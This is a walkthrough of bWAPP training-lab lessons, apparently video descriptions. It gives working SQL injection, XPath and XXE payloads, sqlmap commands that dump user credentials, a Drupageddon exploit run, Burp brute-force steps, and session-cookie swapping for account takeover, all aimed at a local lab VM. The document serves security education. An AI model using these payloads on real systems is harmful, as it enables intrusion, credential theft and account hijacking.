SQL Injection (GET/Search) - Low Security Level Solution:

Step 1. Give ' as an input and click on Search Button. Note MYSQL error will be displayed:

Lets use the payloads and test this lesson.

Follow steps as shown in the video:

Payloads:

1' or 1=1#

' union select all 1,2,3,4,5,6,7#

' union select all 1,database(),user(),system_user(),@@version,6,7#

0' union select all 1, concat(id,login),password,email,secret,6,7 from users #;

* You can click on Search button two times and results will be displayed.

* Test this lesson with other payloads Not covered in this lesson but –

* You can pass the payloads through the url * You can upload all the payloads in BurpSuite automate
the process and check the results.
SQL Injection (GET/Select) - Low Security Level Solution:
Step 1. Click on go and check the url
Step 2. Insert ' as shown in the video and click enter and check the MYSQL error
Step 3. Use the below payloads and follow steps as shown in the video:
Payloads:
0 union select all 1,2,3,4,5,6,7 #
0 union select all 1,database(),user(),system_user(),@@version,6,7
0 union select all 1, concat(id,login),password,email,secret,6,7 from users #
0 union select all 1, concat(id,login),password,email,secret,6,7 from users limit 1,1#
* Explore the lesson with other Payloads.
SQL Injection (POST/Search) - Low Security Level

Solution:

*Note: I am using BurpSuite pre configured browser, in case if you are not using the pre configured
browser then please configure the browser with proxy and then follow the below steps.

Step 1. On the lesson page, click on Search button

Step 2. Go to BurpSuite and add below payload

Payload - 0' union select all 1, concat(id,login),password,email,secret,6,7 from users #

as shown in the video Forward the request

* Explore the lesson with other payloads

SQL Injection (POST/Select) - Low Security Level

Solution:

*Note: I am using BurpSuite pre configured browser, in case if you are not using the pre configured
browser then please configure the browser with proxy and then follow the below steps.

Step 1. Click on Go.

Step 2. Go to BurpSuite remove 1 (For more details check the video).

Step 3. Add below payload

Payload:

0 union select all 1, concat(id,login),password,email,secret,6,7 from users #

Step 4. Forward the request.

Step 5. Go to the lesson page and check the results. *

Explore the lesson with other payloads.

SQL Injection (AJAX/JSON/jQuery) - Low Security Level

Solution:

Step 1. Give any alphabet as an input in the lesson text box and check the output Note when you
give an alphabet as an input results are displayed

Step 2. Give the below payloads as an input and check the results:

Payloads: '-- # (- All movies list are displayed

'order by 1-- #

'order by 2-- #

' union select 1,version(),3,4,database(),6,7 -- #

Note: Not covered in this video:

* Explore the lesson with other payloads.

* For more understanding of the lesson, it is recommended to look at the source code.

* Use BurpSuite to intercept the request and test your inputs for correct results.
SQL Injection Captcha - Manual Intervention Required! - Low Security Level

Solution:

Step 1. Click on here and check if any changes are observed - No changes seen.

Step 2. Click on Reload button and check if any visible changes are seen - Captcha changes

Step 3. Lets give Captcha as an input and click on Proceed. New page is loaded. Notice the url has
been changed. Lesson Page url - http://10.0.2.4/bWAPP/manual_interv.php After giving Captcha url
- http://10.0.2.4/bWAPP/sqli_9.php

Step 4. Give ' as an input and click on Search button. Check the Error.

Step 5. Use the below mentioned payload in the text box and click on Search button.

Payload:

'or'1'='1

0' union select all 1, concat(id,login),password,email,secret,6,7 from users #;

* Explore lesson with other payloads.

SQL Injection (Login Form Hero) - Low Security Level

Solution:

Step 1. Give ' as an input, click on Login and check the output.

Step 2. Use below payloads and check the output.

Payloads:

' or 1=1#

' union select all 1,2,3,4 #

neo ' or 'a'='a

* Explore the lesson with other payloads.

SQL Injection (Login Form/User) - Low Security Level

Solution:

*Note: I am using BurpSuite pre configured browser, in case if you are not using the pre configured
browser then please configure the browser with proxy and then follow the below steps.

Step 1. Give ' as an input in Login text field, click on Login button and check the output.

Step 2. Turn on the intercept. Give bee and bug as an input in Login and Password text field, click on
Login button and check the request in BurpSuite. Note the Cookie and PHPSESSID details
Cookie: security_level=0; PHPSESSID=bf8c882d2a58c90e2b4cd900e45fd2f2

Step 3. Lets create payloads - Follow steps as shown in the video:

Syntax:

sqlmap -u "YOUR URL" --cookie="security_level=0; PHPSESSID=YOUR SESSION ID" --data

"login=bee&password=bug&form=submit" --dbs

Payload 1:

sqlmap -u "http://10.0.2.4/bWAPP/sqli_16.php" --cookie="security_level=0;

PHPSESSID=bf8c882d2a58c90e2b4cd900e45fd2f2" --data "login=bee&password=bug&form=submit"
--dbs

With the same logic below Payloads are created.

Payload 2:

sqlmap -u "http://10.0.2.4/bWAPP/sqli_16.php" --cookie="security_level=0;

PHPSESSID=bf8c882d2a58c90e2b4cd900e45fd2f2" --data "login=bee&password=bug&form=submit"
-D bWAPP --tables

Payload 3:

sqlmap -u "http://10.0.2.4/bWAPP/sqli_16.php" --cookie="security_level=0;

PHPSESSID=bf8c882d2a58c90e2b4cd900e45fd2f2" --data "login=bee&password=bug&form=submit"
-D bWAPP -T users --columns

Payload 4: sqlmap -u "http://10.0.2.4/bWAPP/sqli_16.php" --cookie="security_level=0;

PHPSESSID=bf8c882d2a58c90e2b4cd900e45fd2f2" --data "login=bee&password=bug&form=submit"
-D bWAPP -T users -C login,password,secret --dump

Step 4. Open command prompt, paste the newly created payload in the command window and
check the results.
SQL Injection (SQLite) Low Security Level

Solution:

Step 1. Give ' as an input in the text box and click on Search. Check the output.

Step 2. Use the below Payload to check the output.

Payloads:

' or 1=1 –

0' union select all 1,2,3,4,5,6 –

0' union select all 1,sql,3,4,5,6 from sqlite_master where tbl_name='users' –

* Explore the lesson with other payloads

Drupal SQL Injection (Drupageddon) - Low Security Level

Solution:

Step 1. Click on Drupal and CVE-2014-3704

When you click on Drupal - Welcome to Drupageddon page will be displayed

When you click on CVE-2014-3704 - The page will give you details about the vulnerability.

Step 2. On CVE-2014-3704 page go to EXPLOIT-DB:34992

- Click on the url

- A new window will pop up

- As shown in the video - Click on Exploit - Download - Save File - OK

Step 3. Use below commands

Open your command prompt, go to the folder where you have downloaded the file and give
Commands

- python 34992.py -h

- python 34992.py --target=http://10.0.2.4/drupal/ --username=PseudoTime --pwd=PseudoTime

** You can give username and pwd of your choice

- Check the output

Step 4. Go to the Drupal page and login with your username & password
SQL Injection - Stored (Blog) - Low Security Level

Solution:

Step 1. Use below Payloads to test the lesson

Payloads:

Note: You can modify the prefix of the payload to any name or keep it blank as shown in the video.
PseudoTime',(select @@version)) #

PseudoTime',(select table_name from information_schema.tables limit 0,1)) #

PseudoTime',(select concat(id,login,password) from users limit 0,1)) #

* Test the lesson with different payloads.

SQL Injection - Stored (SQLite) - Low Security Level

Solution:

Step 1. Enter ' and click on Add entry Check the output - The entry was added to our blog!

Note: No changes are displayed any where in the page

Lets test the lesson with '' as an entry and check the results - Now the entries are displayed. Check
the output. Instead of '' only ' is displayed.

Step 2. Use the below payloads to test the lesson - Click on Add Entry once the payloads are given as
an input.

Note: You can modify the prefix of the payload to any name or keep it blank as shown in the video.
Payloads:

PseudoTime',(select sqlite_version())) --

',(select tbl_name from sqlite_master limit 1,1))--

',(select sql from sqlite_master where tbl_name='users'))--

',(select id from users limit 0,1))--

',(select login from users limit 0,1))--

',(select password from users limit 0,1))--

* Note when you click on Delete Entries all your entries will be deleted.

* Explore the lesson with other payloads.

SQL Injection - Stored (User-Agent) - Low Security Level

Solution:

*Note: I am using BurpSuite pre configured browser, in case if you are not using the pre configured
browser then please configure the browser with proxy and then follow the below steps.

Step 1. Choose the lesson bug (as shown in the video) and click on Hack button.

Step 2. Go to BurpSuite and you will see POST /bWAPP/sqli_17.php HTTP/1.1

Check the User-Agent:

Click on Forward

Step 3. You will be taken to GET /bWAPP/sqli_17.php HTTP/1.1

Find User-Agent: and remove all the text in front of it

Add the payload in front of User-Agent:

PseudoTime',(select concat(id,login,password) from users limit 0,1)) #

Step 4. Turn intercept to off and go to the lesson page and check the results.
SQL Injection - Stored (XML) - Low Security Level

Solution:

*Note: I am using BurpSuite pre configured browser, in case if you are not using the pre configured
browser then please configure the browser with proxy and then follow the below steps.

Step 1. Click on Any bugs? button and intercept the request through BurpSuite.

Step 2. Right click and send the request to the Repeater Tab

Step 3. Click on Send and check the Response

Step 4. Add ' as shown in the video and click on send and check the response Check
the error and or Click on render and the output will be displayed

Step 5. Add the payload as shown in the video +

(select 0 from users)+ and click on send and check the output

Step 6. You can test the same lesson with other payload. Follow steps as shown in the video
a. Click on Proxy
b. Right click and sent the request to Repeater page
c. Remove the highlighted text as shown in the video and add the below payload

Payload:
* Note: As Angle Brackets aren't allowed in YouTube Description, replacing them with ( ), kindly
rollback ( ) to Angle Brackets

(?xml version="1.0" encoding="UTF-8" ?) (!

DOCTYPE copyright [(!ENTITY test SYSTEM "file:///etc//passwd")])
(rest)
(login)&test;(/login)
(secret)login(/secret)
(/rest)

d. Click on Send button.

* Explore lesson with other payloads

SQL Injection - Blind - Boolean-Based

Solution:

Step 1. Give input ' and click on Search button. Check the output.

Step 2. Use the below payload and check the output.

Payloads:

'or 1=1#

' or 1=1 and database()='bWAPP' #

' or 1=1 and substring(database(),1,1)='b' #

*Explore the lesson with other payloads.

SQL Injection - Blind - Time-Based - Low Security Level

Solution:

*Note: I am using BurpSuite pre configured browser, in case if you are not using the pre configured
browser then please configure the browser with proxy and then follow the below steps.

Step 1. Click on search button and observe how quickly the page is loaded. Now give below payload
as input and notice there is time delay before the page is loaded.

Payload -
' or 1=1 and sleep(1) #
* If you want you can check the time delay with other payloads.
** Note other time delay payloads are not covered in this video.

Step 2. Turn on the proxy in BurpSuite.

In the bwapp lesson page click on Search button and the request will pass through BurpSuite. Note
the Cookie and PHPSESSID details
Cookie: security_level=0; PHPSESSID=

Step 3. Lets create Payloads

Payloads Syntax:

sqlmap -u "Your lesson url" --cookie="security_level=0;PHPSESSID=" -p title --threads=5 --level=5 --

risk=3 --batch --dbs

-u : url to scan

-p : Paramater to scan

title : Compares responses based on page title

threads: Allows user to define number of concurrent requests to be sent by SQLMap tool. This
reduces overall testing time. This should not be kept at higher value, as it may impact the accuracy
of the result.

Risk & Level: Risk allows the type of payloads used by the tool. By default, it uses value 1 and can be
configured up to level 3. Level 3, being the maximum, includes some heavy SQL queries.

The level defines the number of checks/payload to be performed. The value ranges from 1 to 5. 5,
being the maximum, includes large number of payloads in the scan.

The risk and level are recommended to be increased if SQLMap is not able to detect the injection in
default settings.

batch: Never ask for user input, use the default behavior

dbs : This option is used to enumerate the database

Follow the same logic for other Payloads

sqlmap -u "http://10.0.2.4/bWAPP/sqli_15.php?title=&action=search" --
cookie="security_level=0;PHPSESSID=" -p title --threads=5 --level=5 --risk=3 --batch --dbs
sqlmap -u "http://10.0.2.4/bWAPP/sqli_15.php?title=&action=search" --
cookie="security_level=0;PHPSESSID=" -p title --threads=5 --level=5 --risk=3 --batch -D "bWAPP" --
tables

sqlmap -u "http://10.0.2.4/bWAPP/sqli_15.php?title=&action=search" --
cookie="security_level=0;PHPSESSID=" -p title --threads=5 --level=5 --risk=3 --batch -T "heroes" --
columns

Step 4. Open command prompt, paste the newly created payload in the command window and
check the results.
SQL Injection - Blind (SQLite) - Low Security Level

Solution:

Step 1. In the bWAPP lesson page give ' as an input and click on search.

Step 2. Use sql payload as an input 'or 1=1-- and check the output. From this we can conclude that
the lesson is vulnerable with SQL Injection.

Step 3. Other way to test the lesson is by using below payload

Click on Search
Add the below payload as shown in the video
'union+select+1,2,sql,4,5,6 from sqlite_master--+-

Step 4. Let's exploit the lesson with sqlmap, for capturing session ID I am using BurpSuite, you can
choose your choice of application.

*Note: I am using BurpSuite pre configured browser, in case if you are not using the pre configured
browser then please configure the browser with proxy and then follow the below steps.

Turn on the proxy in BurpSuite.

In the bWAPP lesson page click on Search button and the request will pass through BurpSuite.
Note the Cookie and PHPSESSID details
Cookie: security_level=0; PHPSESSID=fc6ec097759412111b326b82f14339e3

Step 5. Modify the below payload with your systems details:

sqlmap -u "http://10.0.2.4/bWAPP/sqli_14.php?title=&action=search" --
cookie="security_level=0;PHPSESSID=fc6ec097759412111b326b82f14339e3" -p title --dbms=sqlite --
threads=5 --level=5 --risk=3 --hex --dbs --tables

Step 6. Open command prompt, paste the newly created payload in the command window and
check the results.

*Give inputs wherever required. In case if it ask when you are executing the payload.
** Test the lesson with other payloads.
SQL Injection - Blind (WS/SOAP - Simple Object Access Protocol) Low Security Level

Solution:

Step 1. Select a movie and click on Go and check the output. Perform the same step with other
movie name. The ticket number changes.

Step 2. Select a movie again of your choice click on go and in the url next to movie name add the sql
payload ' or 1=1 (please refer to the video for more details) and check the output.
Note: Ticket number details are missing.

Step 3. Replace the earlier payload and add a new sql payload ' or '1' = '1 (as shown in the video) and
check the output.
Note: Now the ticket numbers are visible once again, but they are more in nuumber than the actual
count.

Step 4. Reload the lesson select movie name of your choice and click on go.
Give below payload as an input and check the output
' or length(database())=4 and '1'='1 - Same ticket numbers
Reload the lesson and click on go. Add the below payload as shown in the video.
' or length(database())=5 and '1'='1 - Ticket numbers have changed
From this we can conclude that the length of database name is 5 characters.

Step 5. We can test the lesson with sqlmap as well, copy paste the below payload in Command
Prompt. Note: Directly showing the results to save time.
Change the url IP and PHPSESSID as per your system details.
Payload:

sqlmap -u "http://10.0.2.4/bWAPP/sqli_5.php?title=Man+of+Steel&action=go" --
cookie="security_level=0;PHPSESSID=fc6ec097759412111b326b82f14339e3" -p title --threads=5 --
level=5 --risk=3 --batch -D bWAPP --tables

* Explore the lesson with other payloads.

XML/XPath Injection (Login Form)

Solution:

Step 1. Enter ' in the login text box and click on the Login button and check the results.
(Please follow video for more details).
Error: Warning: SimpleXMLElement::xpath(): Invalid predicate in
/var/www/html/bWAPP/xmli_1.php on line 78 You can go through the entire code.
We will try login with the credentials neo and trinity
Lets do a white box testing
Login successful
You can also test the lesson with logically true statements as below.

Step 2. Enter the below code in the login text box

-) PseudoTime'or 1=1 or '1'='1
* Instead of PseudoTime you can use your own name or you can simply ignore the prefix

Step 3. You can keep the password blank or give password of your choice.
We will check with both the conditions:
1. Without password
2. With password (You can enter any value of your choice).

* You can test the lesson with other logically true statements.
XML/XPath Injection (Search)

Solution:

Step 1. Click on the search button and check the url result.
Click on the movie by genere drop down box and click on search button and check the result. Note:
As we change the genere value in drop down box the url changes, lets try exploiting the genere field
value.

Step 2. Give ' as an input as shown in the video

Step 3. Note the warning

Step 4. Lets go through the white box testing approach. Open the code and check the line no 158.

This injection is more of a blind XML/XPath.

Lets use the below payload

Payload: ')]/child::node() | PseudoTime[contains(PseudoTime,'

* You can replace the PseudoTime value with any other name Check the results.
A2-BROKEN
AUTHENTICATION
AND SESSION
MANNAGEMENT
Broken Auth. - CAPTCHA Bypassing - Low Security Level

Solution:

*Note: I am using BurpSuite pre configured browser, in case if you are not using the pre configured
browser then please configure the browser with proxy and then follow the below steps.

Step 1. Complete the Login, Password and Captcha fields and click on Login.

Step 2. Go to BurpSuite and right click on the mouse send the request to intruder page.

Step 3. Click on Positions and then click on clear button as shown in the video and change the attack
type to cluster bomb.

Step 4. In Position tab select bug and click on add and select bee and click on add

Step 5. Click on Payloads - Select Payload set 1 and Payload type as Simple list; in Add text add values
- bee, admin, 1234 (For real life testing scenarios you can copy paste the list of your choice) Now
Slecet Payload set 2 and keep the Payload type as Simple list; in Add text add values - bug, test,
password and anyother values of your choice. (Note, more values will take more time to execute the
attack due to large number of combination testing).

Step 6. Click on options Go to Grep Match Click on the check box - Flag result items with responses
matching these expressions. Click on clear and yes and add your comment here.
Match type - Simple String
Click on Exclude HTTP Headers

Step 7. Go to Positions and click on Start attack.

Step 8. Click ok, if BurpSuite gives a pop up.

Step 9. Click on length and check results for bee and bug.

Click on Response and search for word successful login

Click on Render and see the successful login page

Broken Auth. - Forgotten Function - Low Security Level

Solution:

Step 1. Click on create user and complete the details

Note: (Email details I have captured is fake).

Step 2. Once the user is created, come back to lesson and give the email id and check the results on
the lesson page.
Broken Auth. - Insecure Login Forms

Solution:

Step 1. Right click and click on View Page Source

Login – tonystark

Password - I am Iron Man

Broken Auth. - Logout Management

Solution:

Step 1. Click on the word here - a pop up will be displayed - Are you sure - Click on OK.

Step 2. Click on the back arrow as shown in the video. You will be taken back to the lesson.
Broken Auth. - Password Attacks

Solution:

*Note: I am using BurpSuite pre configured browser, in case if you are not using the pre configured
browser then please configure the browser with proxy and then follow the below steps.

Step 1. Enter the login name bee and give incorrect password and click on Login.

Step 2. Go to BurpSuite and right click on the mouse send the request to intruder page.

Step 3. Click on Positions and then click on clear button as shown in the video and change the attack
type to sniper.

Step 4. In Position tab select wrongpassword and click on add

Step 5. Click on Payloads - Payloads set 1, Payload type - Brute forcer (To save time I am limiting the
field search to 3 alphabets only)

Step 6. Click on options Go to Grep Match Click on the check box - Flag result items with responses
matching these expressions. Click on clear and yes and add your comment here.
Invalid credentials! Did you forgot your password? - You can get this comment by following the steps
as shown in the video

Match type - Simple String

Click on Exclude HTTP Headers

Step 7. Start the attack. If a pop up comes click ok.

Step 8. Click on length and check the results. Click on Response and search for word successful login
Click on Render and see the successful login page

Also, you can solve this lesson with other attacks. (Explore the same - I have not covered in this
lesson).
Broken Auth. - Weak Passwords Low Security Level

Solution:

Step 1. We are going to go through white box testing approach to find the username and password:
Go the source code, follow steps as shown in the video.

Step 2. You can also try solving the lesson with the help of

1. Sniper attack - Payload Brute Force/ E.g.

• Broken Auth Password Attacks Low S...

2. Cluster Bomb - Payload Simple List E.g. • Broken Auth CAPTCHA Bypassing Low ...
* Note - (Not covered in this video).

However, if you want to see how the above mention attack works, then request to please check the
below recommended videos.

a. Broken Auth. - CAPTCHA Bypassing - Low Security Level

b. Broken Auth. - Password Attacks

Links for both the lessons are shared in the Description.

Try to exploit the lesson with the above 2 mentioned attacks.

Session Mgmt. - Administrative Portals

Solution:

*Note: I am using BurpSuite pre configured browser, in case if you are not using the pre configured
browser then please configure the browser with proxy and then follow the below steps.

Step 1. Refresh/Reload the lesson page

Step 2. Go to BurpSuite and find -

GET /bWAPP/smgmt_admin_portal.php?admin=0 HTTP/1.1
Change the 0 to 1 and forward the request
Check the results on lesson page.

Also, if you dont want to use BurpSuite then simply try to make changes in the url directly.
Turning - Proxy off and resetting the lesson for quick demo.
Session Mgmt. - Cookies (HTTPOnly) - Low Security Level

Solution:

This lesson performs Server-Side Includes (SSI) Injection attack to obtain the cookie value. For more
details check out the bWAPP lesson video: • Server Side Includes SSI Injection Lo...

Pre-requisite - In this lesson you will need to use 2 users.

You can create the 2nd user by completing details on Create User tab.
(*As I have already created a user - I am skipping this step)
The 1st user will be - uname - bee pwd –bug

*Note: I am using BurpSuite pre-configured browser, in case if you are not using the pre-configured
browser then please configure the browser with proxy and then follow the below steps.

Step 1. Go to the lesson page with your 2nd username in my case PseudoTime.
Click on Cookies button and pass the request through BurpSuite, note the
PHPSESSID - voatd3av85dd8m4mcjcdv49aug
* Your PHPSESSID will be different.

Step 2. Open another browser and login with bee bug user credentials,
go to the lesson page and note the PHPSESSID - 2eqitnakftuvgdjcrts6gnkn68
Follow steps as shown in the video.

Step 3. Go to BurpSuite and change PseudoTime cookie information with bee bug
cookie information and click on Intercept is On it will change to Intercept is Off and visit the lesson
page. Note - PseudoTime login has been replaced with bee login.
Session Mgmt. - Cookies (Secure) - Low Security Level

Solution:

Pre-requisite - In this lesson you will need to use 2 user accounts.

You can create the 2nd user account by completing details on Create User tab.
(*As I have already created a user - I am skipping this step)
The 1st user account will be - uname - bee pwd -bug

*Note: I am using BurpSuite pre-configured browser, in case if you are not using the pre-configured
browser then please configure the browser with proxy and then follow the below steps.

The steps for this lesson is more or less similar to the earlier lesson Session Mgmt. - Cookies
(HTTPOnly) - Low Security Level. For more details you can visit the lesson page on - details
mentioned in the description.

• Session Mgmt Cookies HTTPOnly Low ...

**You can right click on the lesson page - select Inspect - Application - Cookies - http:// local and
check the Secure column it is blank which makes sure that this lessons Cookies are not set to secure.

Step 1. Go to the lesson page with your 2nd username in my case PseudoTime.
Click on Cookies button and pass the request through BurpSuite, note the
PHPSESSID - 2c8et2m7k2v2mnugr62fo0o6ua
* Your PHPSESSID will be different.

Step 2. Open another browser and login with bee bug user credentials,
go to the lesson page and note the PHPSESSID - ku03lmivhsa3v1g07dblu699e5
Follow steps as shown in the video.

Step 3. Go to BurpSuite and change PseudoTime cookie information with bee bug cookie
information and click on Intercept is On it will change to Intercept is Off and visit the lesson page.
Note - PseudoTime login has been replaced with bee login.
Session Mgmt. - Session ID in URL - Low Security Level

Solution:

Pre-requisite - In this lesson you will need to use 2 users.

You can create the 2nd user by completing details on Create User tab.
(*As I have already created a user - I am skipping this step)
The 1st user will be - uname - bee pwd -bug

*Note: I am using BurpSuite pre-configured browser, in case if you are not using the pre-configured
browser then please configure the browser with proxy and then follow the below steps.

Step 1. Observe the url, you can see the PHPSESSID details. Right click and click on Reload, let the
request pass through the BurpSuite.
PseudoTime PHPSESSID - e3t1d57e3udpu2v5ei9mddn2c7
* Note your PHPSESSID will be different

Step 2. Follow steps as shown in the video.

Open another browser and login with bee bug user credentials,
go to the lesson page and note the PHPSESSID - in url.
Bee PHPSESSID - mojtcpvt6sfv89bauhqed7fq90

Step 3. Go to the BurpSuite and change the PseudoTime (your 2nd user) PHPSESSID details with
bee/bug PHPSESSID details as shown in the video. Forward the request and visit the login page
where you have logged in with PseudoTime (your 2nd user),
you will see Pseudotime (your 2nd user) has been replaced with bee.

** This lesson can be solved in more than 1 way - Research and explore the different ways.
Session Mgmt. - Strong Sessions - Low Security Level

Solution:

Pre-requisite - In this lesson you will need to use 2 users.

You can create the 2nd user by completing details on Create User tab.
(*As I have already created a user - I am skipping this step)
The 1st user will be - uname - bee pwd -bug

*Note: I am using BurpSuite pre-configured browser, in case if you are not using the pre-configured
browser then please configure the browser with proxy and then follow the below steps.

Step 1. Go to the lesson page and click on Cookie and note the PHPSESSID - details.

Step 2. Click on here and see the new browser tab it will display the below results: Welcome
PseudoTime, You have a valid session but not a strong session!

Step 3. Go to BurpSuite and Turn on the Intercept.

Step 4. Go to the lesson page and click on here and check the details in BurpSuite.

Step 5. Follow steps as shown in the video - open new browser and login as bee bug and go to the
lesson. Copy the Bee PHPSESSID and replace the PseudoTime PHPSESSID with Bee PHPSESSID.
Bee PHPSESSID - sa6g7o8n974ajqopa03m2l94or
PseudoTime PHPSESSID - e3t1d57e3udpu2v5ei9mddn2c7
Follow steps as shown in the video

Step 6. Check the result - Welcome PseudoTime has been changed to Welcome Bee.